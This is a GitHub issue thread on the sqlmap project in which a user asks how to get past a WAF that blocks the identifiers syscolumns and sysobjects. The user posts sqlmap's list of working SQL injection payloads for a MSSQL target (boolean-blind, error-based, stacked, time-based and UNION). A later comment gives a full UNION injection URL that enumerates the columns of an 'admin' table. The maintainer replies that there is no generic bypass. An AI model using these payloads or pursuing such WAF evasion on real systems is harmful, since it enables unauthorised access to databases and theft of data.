### ISSUE TITLE
WAF block special words

### ISSUE THREAD

**Issue by madaxcr** [sqlmapproject/sqlmap#3691]
Hello guys,

WAF block few words like syscolumns, sysobjects and few more.

I can dump dbs and tables but can't dump any data.

Is there any workaround?

No tamper scripts work here.

Attack payloads below:

---
Parameter: Country (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: propType=R&Country=Ant' AND 3532=3532 AND 'OMMl'='OMMl&Region=English
    Vector: AND [INFERENCE]

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: propType=R&Country=Ant' AND 3164 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3164=3164) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113)+CHAR(113))) AND 'tVYj'='tVYj&Region=English
    Vector: AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: propType=R&Country=Ant';WAITFOR DELAY '0:0:5'--&Region=English 
    Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: propType=R&Country=Ant' WAITFOR DELAY '0:0:5'--&Region=English 
    Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: propType=R&Country=Ant' UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(108)+CHAR(107)+CHAR(67)+CHAR(76)+CHAR(103)+CHAR(97)+CHAR(65)+CHAR(87)+CHAR(77)+CHAR(106)+CHAR(89)+CHAR(71)+CHAR(84)+CHAR(119)+CHAR(98)+CHAR(76)+CHAR(106)+CHAR(121)+CHAR(109)+CHAR(86)+CHAR(102)+CHAR(107)+CHAR(78)+CHAR(84)+CHAR(73)+CHAR(122)+CHAR(101)+CHAR(120)+CHAR(99)+CHAR(101)+CHAR(104)+CHAR(116)+CHAR(87)+CHAR(116)+CHAR(68)+CHAR(67)+CHAR(89)+CHAR(66)+CHAR(109)+CHAR(118)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(113)+CHAR(113)-- DiAB&Region=English 
    Vector:  UNION ALL SELECT [QUERY][GENERIC_SQL_COMMENT]
---

Thank you

**Comment by stamparm** [comment]
* I would say that there is a greater chance that access to those identifiers is being restricted at the DBMS level
* In cases when identifiers are being blocked (WAF or DBMS) there is generally no generic way how to bypass it
* You've provided ZERO details on your research of the WAF behavior itself. Zero research basically calls for zero support

**Comment by madaxcr** [comment]
Well, there is a generic response of WAF if I test for example the following URL:
"
https://www.example.com/r/img/img_srch/?id=tav_663174-4623' UNION ALL SELECT 4350,4350,4350,4350,(SELECT holprop..syscolumns.name AS tjbe,TYPE_NAME(holprop..syscolumns.xtype) AS gpju FROM holprop..syscolumns,holprop..sysobjects WHERE holprop..syscolumns.id=holprop..sysobjects.id AND holprop..sysobjects.name='admin' FOR XML RAW, BINARY BASE64),4350,4350,4350,4350,4350,4350,4350,4350,4350,4350,4350,4350,4350,4350-- bbRz
"
Web page throws and error:
"
Your input was rejected. 	You have entered text or a command that was rejected by our server as  harmful. Return to previous page and try adjusting your entry.
"

As soon as I remove syscolumns and sysobjects words from URL the page is blank.

Thanks
